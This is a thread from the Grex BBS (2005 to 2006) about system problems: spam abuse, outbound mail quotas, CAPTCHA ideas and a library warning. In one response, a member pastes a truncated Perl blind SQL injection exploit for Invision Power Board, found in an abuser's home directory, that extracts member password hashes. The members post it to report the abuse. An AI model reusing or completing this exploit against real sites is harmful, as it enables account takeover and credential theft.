|
Grex > Agora56 > #4: Grex System Problems - Winter 2005/06 | |
|
| Author |
Message |
| 25 new of 260 responses total. |
bhoward
|
|
response 50 of 260:
| 
Dec 30 05:00 UTC 2005 |
An ascii-art / figlet kine CAPTCHA somehow seems very appropriate
for grex :-)
|
keesan
|
|
response 51 of 260:
|
Dec 30 05:33 UTC 2005 |
What size quota? I just sent out (not from grex this time because I don't
want anyone replying here because it is unreliable) the same little mail to
about 40 people (happy new year). How many copies do spammers send?
|
tsty
|
|
response 52 of 260:
|
Dec 30 06:24 UTC 2005 |
39 ....
|
gull
|
|
response 53 of 260:
|
Dec 30 07:29 UTC 2005 |
Exim 4.x has a very sophisticated ACL mechanism. I would bet someone
has implemented outbound quotas in it at some point.
The ASCII CAPTCHA idea is a pretty good one, too. :)
|
bhoward
|
|
response 54 of 260:
|
Dec 30 08:39 UTC 2005 |
Sindi, what often happens is that someone will come in from AOL,
create a batch of accounts, then set each one going mass mailing
anywhere from a few hundred to several 1000 different addresses.
I believe on a few occasions, Steve has had to clean up spam
loads on the order of 10's of thousands.
I'm sure you are right, David. I just don't know much about exim
yet (I run postfix for my family ISP)...but I expect I will be
learning a bit more as I wade into this.
|
rcurl
|
|
response 55 of 260:
|
Dec 30 16:29 UTC 2005 |
What do spammers give typically as a *return* address when they spam from
Grex?
|
aruba
|
|
response 56 of 260:
|
Dec 30 17:57 UTC 2005 |
I thik the return address on most spam is a fake email address, or a stolen
one. Spammers expect you to respond by going to their website, not by
replying to their email.
|
gull
|
|
response 57 of 260:
|
Dec 30 20:10 UTC 2005 |
Re resp:54: The Exim email list is extremely helpful. There's also a
package of sample configurations that has a lot of useful stuff in it.
|
keesan
|
|
response 58 of 260:
|
Dec 30 20:16 UTC 2005 |
Can you limit outgoing mails to 25 or 50 addresses per mailing, and 100 mails
per day, or 1MB per day? Or even limit to 10 and 25, with exceptions for
members?
|
tod
|
|
response 59 of 260:
|
Dec 30 21:51 UTC 2005 |
SQL exploit hackers in action on Grex....
mirror pf 62.33.88.166 4:13PM 4 perl ipb.pl http://forum.unix.kg
/ 4
!more ~mirror/ipb.pl
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .=chr($i);;
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
Then under the "Pass nik" directory are a file for ID's and another...
NICE...NOT!
|
keesan
|
|
response 60 of 260:
|
Dec 30 22:45 UTC 2005 |
Please translate the previous response.
|
tod
|
|
response 61 of 260:
|
Dec 30 22:50 UTC 2005 |
re #60
User "mirror" was running an SQL exploit via lynx and perl against a site in
Kyrgyzstan. The files are in mirror's home directory.
|
bhoward
|
|
response 62 of 260:
|
Dec 30 23:16 UTC 2005 |
Mirror is no longer running this exploit.
|
albaugh
|
|
response 63 of 260:
|
Dec 31 19:11 UTC 2005 |
Without some kind of control on outbound internet e-mail abuse, grex will soon
be unusable as an e-mail sender. Among other commercial sites, here is a
blacklisting auto reply against grex from AOL:
AOL does not accept e-mail transactions from IP addresses which
generate complaints or transmit unsolicited bulk e-mail.
|
keesan
|
|
response 64 of 260:
|
Jan 2 02:50 UTC 2006 |
I am getting a message about the wrong version of some library when I type
bbs but it proceeds anyway. picospan
|
bhoward
|
|
response 65 of 260:
|
Jan 2 03:37 UTC 2006 |
Thanks. You can safely ignore this for the time being. It will go away
when picospan is recompiled for the releaes of OpenBSD now running on grex.
|
keesan
|
|
response 66 of 260:
|
Jan 2 04:36 UTC 2006 |
I did not get that message this time.
|
bhoward
|
|
response 67 of 260:
|
Jan 2 08:57 UTC 2006 |
Any chance you were running fronttalk this time, instead of picospan?
|
keesan
|
|
response 68 of 260:
|
Jan 2 16:34 UTC 2006 |
I typed bbs, as usual. Never got the message until that one time, yesterday.
|
davel
|
|
response 69 of 260:
|
Jan 2 16:39 UTC 2006 |
For what it's worth, members of my family are among those who have no other
email access. (This is regarding what cross said, way back.) You might
be surprised at how many users there are in this state.
|
cross
|
|
response 70 of 260:
|
Jan 2 17:09 UTC 2006 |
This response has been erased.
|
keesan
|
|
response 71 of 260:
|
Jan 2 17:16 UTC 2006 |
I got the warning again about the picospan library. I must simply not be
noticing it the rest of the time.
Can't you just throttle mail usage for non-members instead?
|
cross
|
|
response 72 of 260:
|
Jan 2 17:21 UTC 2006 |
This response has been erased.
|
rcurl
|
|
response 73 of 260:
|
Jan 2 18:39 UTC 2006 |
What, again, is the point of turning off e-mail use for non-members, even if
there are few dependent upon it (which is yet to be established)? Non-members
are the future life of Grex as that's the group from which members come.
If some misuse is the problem, why should that be the reason to punish others?
|
cross
|
|
response 74 of 260:
|
Jan 2 19:00 UTC 2006 |
This response has been erased.
|